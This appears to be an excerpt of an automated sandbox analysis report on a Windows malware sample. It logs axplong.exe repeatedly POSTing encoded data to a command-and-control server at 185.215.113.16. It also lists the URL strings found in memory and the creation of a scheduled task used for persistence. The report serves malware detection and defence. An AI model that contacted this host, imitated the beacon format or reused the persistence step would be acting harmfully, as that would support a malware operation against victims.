                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F2BD60 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile,InternetReadFile,6_2_00F2BD60
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php&
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php?
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpCHIz
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD;.N
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpDri
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpIVE
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpL
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpMicR
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpN
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpO
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpPC
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpSSv
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpSy
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpY
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_RE&R
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpa=C
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpinb
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpm
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded)
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpndows
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpom
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phprs
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phptem
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpw
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpxSu

                    System Summary

                    barindex
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F24CF06_2_00F24CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F630686_2_00F63068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F2E4406_2_00F2E440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F57D836_2_00F57D83
